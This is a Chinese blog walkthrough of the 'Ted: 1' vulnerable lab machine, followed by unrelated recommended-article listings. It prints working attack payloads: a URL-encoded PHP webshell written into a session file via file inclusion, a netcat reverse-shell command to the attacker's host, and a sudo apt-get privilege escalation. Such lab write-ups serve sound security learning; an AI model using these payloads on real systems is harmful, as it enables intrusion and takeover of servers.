Ted:1 打靶渗透

最新推荐文章于 2024-09-09 15:42:52 发布
最新推荐文章于 2024-09-09 15:42:52 发布
阅读量274 收藏 6
点赞数 5
文章标签: 网络 linux 运维 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65112983/article/details/140830894
版权

一、信息收集

1、查看靶机mac地址:

2、查看靶机的ip地址:

nmap 192.168.13.0/24

3、查看靶机开放的端口,只开放了http服务:

nmap -p- 192.168.13.149

4、访问80端口,是一个登录框:

5、对其进行目录扫描:

dirsearch -u "http://192.168.13.149"

扫描目录没有结果。

6、尝试弱口令admin;admin登录,发现给出提示需要hash加密:

7、将密码admin进行加密:

转换大小写后的值为:8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918

8、使用账号密码进行登录,发现成功登录:

9、经过测试,发现在search搜索框中存在任意文件读取:

10、尝试包含用来存储用户session的文件,从而获取shell:

在Linux下 PHP语言的session的存储路径如下:

/tmp 或 /var/lib/php/sess_[PHPSESSID]

/var/lib/php5/sess_[PHPSESSID]

/var/lib/php/sessions/sess_[PHPSESSID]

抓取一个有session的请求包,拿到session:

11、拼接如下路径search读取:

/var/lib/php/sessions/sess_5geekjjnb8s3cro4mt6nn5d4b3

12、抓包将数据包放到重放模块里进行测试,发现可以修改user_pref变量的值,从而写入到session文件中,再结合文件包含漏洞,造成RCE的漏洞:

13、写入一句话木马但需要url编码:

%3C%3Fphp%20system(%24_POST%5B%22cmd%22%5D)%3B%20%3F%3E

14、向user_pref加入编码后的一句话木马,发现值改变了:

15、尝试输入命令,查看是否写入木马成功:

16、kali开启监听:

nc -lvvp 3333

17、向文件中执行反弹shell语句:

nc+192.168.13.128+3333+-e+/bin/bash

18、查看是否反弹到,反弹成功,用户权限较低:

19、获得一个交互式shell:

python -c 'import pty;pty.spawn("/bin/bash")'

二、提权

1、输入sudo -l查看用户sudo权限:

2、发现用户有一个文件可以,尝试使用提权:

sudo apt-get changelog apt

成功提到root权限

搬砖小星
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【RASA】TED Policy:Dialogue Transformers
12-16 695
计算嵌入之间的差异,TED Policy最大化与目标标签的相似性并最小化与错误标签的相似性,这是一种基于Starspace算法的技术。自注意力机制发挥作用的地方:transformer 在每一轮动态访问对话历史的不同部分,然后评估和重新计算前几轮的相关性。在每个对话回合,TED Policy将3部分信息作为输入:用户消息的意图和实体、预测的先前执行的Action、槽位。当需要预测下一个系统动作时,所有可能的系统动作根据它们的相似度进行排序,并选择相似度最高的动作。那这3部分是如何特征化的呢?
TED: Test Environment for DAPL-开源
07-01
TED 为 uDAPL、设备驱动程序和底层 HCA 的协议级测试和调试提供了一个简化的环境,其中可以通过在 shell 提示符下键入命令来执行 uDAPL API。 RDMA 和 Send-Recv 可以进行负载测试。
TED: 1靶场复现【附代码】(权限提升)
weixin_52487093的博客
08-13 1178
TED: 1靶场复现【附代码】(权限提升)
TED:Grit: The power of passion and perseverance(Angela Lee Duckworth)
当路danglu0010
04-01 3598
TED:Grit: The power of passion and perseverance
TED:不要固执于英语
空山无人,水流花开
04-28 583
让我们一起为多元化欢呼,尊重你的语言,用它来传播你优秀的思想
Ted:记忆的虚构》——Elizabeth Loftus(有感)
RedRaspberryFlower
06-06 2151
这个视频来自著名心理学家Elizabeth Loftus于TED演讲中的一场很精彩的演说。
TED :Linux 操作系统之父
Artemisia_Alice的小窝
07-23 1224
Linus Benedict Torvalds  Linux 操作系统之夫 网易公开课上的一个TED视频: http://open.163.com/movie/2016/6/3/9/MBPNHJU6K_MBR358639.html 完全被Linus Benedict Torvalds给圈粉了,他偶尔尴尬的傻笑,, 一本正经的回答总是说出会被误解的话,然后怕误解想解释又不知道怎么说哑口无言
【2015-01-07】感悟TED:20岁光阴不再来
quanqiuzhongzi的专栏
01-07 2237
一点感悟,一点记录!
大脑基础知识--TED:
samantha_wang的专栏
08-16 599
TED Talk: The quest to understand consciousness  链接 点击打开链接 很精彩 Allan Jones: A map of the brain  点击打开链接
随便听听:Day 1 TED Radio Hour
weixin_45783752的博客
02-13 472
随便听听:Day 1 TED Radio Hour Episode: How to choose TED talks speakers. keep our ears on the ground 高度警觉 dirty laundry 某人不可告人的秘密或者是家丑 hypocrisy 伪善 n. Africa is a sleeping giant. lol. Nigeria 尼日利亚 targeted demographic 目标人群 (demographic居然还有这意思) medical touris
TED:Arnaud,Ram,Sophie,Duncan和Jules
02-14
TED对话视图的预测 Arnaud,Ram,Sophie,Duncan和Jules TED演讲是TED Conferences LLC主持的演讲的录像带。 TED成立于1984年,此后因在技术,科学,教育等领域传播鼓舞人心的强大构想而树立了声誉,迄今为止,其...
TED:消除肿瘤微环境卷积的完全贝叶斯方法
03-18
TED(现称为BayesPrism) 使用统计边际化(BayesPrism)推断贝叶斯细胞比例重建:肿瘤微环境组成和基因表达的完全贝叶斯推断。 BayesPrism由反卷积模块和嵌入学习模块组成。去卷积模块利用来自scRNA-seq的细胞类型...
eat-ted:媒体RSS Feed阅读器,用于使用AngularJS,Angular Material,HTML5视频和Sass的最新TED演讲
05-03
【eat-ted】是一个基于AngularJS、Angular Material和Sass技术构建的媒体RSS Feed阅读器,专注于展示最新的TED演讲。这个应用充分利用了HTML5视频功能,使得用户可以在一个响应式的网页环境中观看和浏览TED演讲。它...
ted:用于使用C ++ 20和nana c ++框架Linux的简单文本编辑器
04-06
"ted" 是一个简单的文本编辑器,专为Linux系统设计。它采用C++ 20这一现代C++版本进行开发,并利用了"Nana C++框架"来构建用户界面和实现编辑器的功能。C++ 20是C++语言的一个重要更新,引入了许多新特性,如模块化...
UDP协议
hyldzbg的博客
09-04 880
把当前要计算校验和的数据,每个字节,都进行累加,把结果保存到这两个字节的变量(校验和)中,过程中溢出也没关系,如果中间某个数据,出现传输错误,第二次计算的校验和就会和第一次不同(CRC这个算法其实不是特别靠谱,比如如果前一个字节大小少1,后一个字节大小多1,那么最后得到的校验和任然相同,但是数据可能已经不同了)。描绘这个数据报的报文长度(包含报头),这里的长度是指该报文有多少个字节,因为只有16位比特位的大小,因为数据传输可能会出错,所以需要一定的方法知道所传输的数据是否正确传输。
网络第五章:多路转接
qincjun的博客
09-05 581
2.HTTP1.1采用了长连接的方式来进行通信:建立连接,服务器响应完之后,不断开连接,活跃的用户对服务器发送请求,服务器都会正常响应;对不活跃的用户,不进行任何操作;events是分配好的epoll_event结构体数组.epoll将会把发生的事件赋值到events数组中 (events不可以是空指针,内核只负责把数据复制到这个events数组中,不会去帮助我们在用户态中分配内存).epoll通过这些值的设定,来监视fd的行为,如果fd做了这些行为,则会通过epoll_wait来反馈给上层,进行处理。
​数据链路层——流量控制&可靠传输机制 ​
最新发布
qq_25467441的博客
09-09 542
例题:一个信道的数据传输率为4kb/s ,单向传播时延为30ms ,如果使停止-等待协议的信道最大利用率达到80%,要求的数据帧长度至少为。设数据帧的长度为L比特,则发送方发送全部的数据需要时间:L/4。“停止-等待”就是每发送完一个分组就停止发送,等待对方确认,在收到确认后再发送下一个分组。因为是在讨论可靠传输的原理,所以并不考虑数据是在哪一个层次上传送的。发送方在一个发送周期内,有效地发送数据所需要的时间占整个发送周期的比率。数据链路层的流量控制是点对点的,而传输层的流量控制是端到端的。
200 Gb/s和400 Gb/s网络
dncsk的专栏
09-07 1374
116.200 Gb/s和400 Gb/s网络简介写在前面 :1.需要英文原文请自行官网下载2.本人无授权故亦不接受相关付费服务 如有商业性需求建议寻找有资质的书籍供应商购买3.翻译纯粹为爱发电,因为机器翻译所以错乱较多 建议参照英文原文对比使用 4.欢迎评论区提出建议或意见 原则上不删除评论 原则上不回复私信 和解呈现200GBASE-RPCSPMDIEEEStd802.3-2022,IEEE以太网标准第八节116.200Gb/s和400Gb/s网络116.1概述116.1范围本条款描述了200千兆位和4
TED演讲:保密小目标,增强实现动力
TED英语演讲中,演讲者提出一个引人深思的观点:设定一个个人大目标并告诉他人可能会削弱你实现它的动力。这个观点基于心理学研究,表明公开宣布目标会带来即时的心理满足感,但这反而可能导致人们在实际行动上变...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值